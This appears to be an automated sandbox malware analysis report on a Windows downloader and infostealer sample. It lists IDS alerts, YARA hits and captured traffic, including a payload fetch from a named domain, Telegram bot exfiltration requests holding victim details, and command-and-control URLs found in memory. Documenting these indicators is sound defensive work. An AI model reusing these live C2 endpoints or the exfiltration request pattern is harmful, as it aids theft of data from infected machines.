Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 29EC1516h	14_2_29EC1248
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 29EC030Eh	14_2_29EC0040
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 29EC6F18h	14_2_29EC6C20
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 29EC3506h	14_2_29EC3238
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 29ECC528h	14_2_29ECC230
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 29EC8700h	14_2_29EC8408
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 29ECF4F9h	14_2_29ECF200
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 29ECDD10h	14_2_29ECDA18
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 29F01190h	14_2_29F00E98
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 29F00CC8h	14_2_29F009D0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 29F00800h	14_2_29F00508
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 29F00338h	14_2_29F00040
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	14_2_29F23548
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	14_2_29F2EE90
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	14_2_29F2EE98
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	14_2_29F20040
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	14_2_29F20011
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	14_2_29F20356
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	14_2_29F23538
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then mov ecx, 000003E8h	14_2_2A6F0970
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-40h]	14_2_2A6F0630
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-40h]	14_2_2A6F0628

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49765 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49772 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://fodoknotel.za.com/233_Pumyophnrer

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 14.2.nhpoymuP.pif.28470000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f3499de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d299de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.nhpoymuP.pif.25817960.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.284d0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.306ae390.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27a00000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.275099de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.323b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30655570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30656458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.nhpoymuP.pif.240bcc58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\image.exe

Code function: 0_2_02CAE2F0 InternetCheckConnectionA,

0_2_02CAE2F0

Source: global traffic

TCP traffic: 192.168.2.4:49773 -> 208.91.198.176:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20and%20Time:%2003/01/2025%20/%2004:14:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20138727%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20and%20Time:%2003/01/2025%20/%2001:16:54%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20138727%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49750 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49755 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49743 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 23.237.26.135:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49751 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49767 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 188.114.97.3:443

Source: global traffic

TCP traffic: 192.168.2.4:49773 -> 208.91.198.176:587

Source: global traffic	HTTP traffic detected: GET /233_Pumyophnrer HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: fodoknotel.za.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /233_Pumyophnrer HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: fodoknotel.za.com
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20and%20Time:%2003/01/2025%20/%2004:14:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20138727%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20and%20Time:%2003/01/2025%20/%2001:16:54%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20138727%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: fodoknotel.za.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.techniqueqatar.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 02 Jan 2025 15:05:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 02 Jan 2025 15:05:52 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027BCC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.000000002606E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: nhpoymuP.pif, 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: nhpoymuP.pif, 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1986029241.000000002F651000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1986029241.000000002F6BC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027AC1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025ED1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
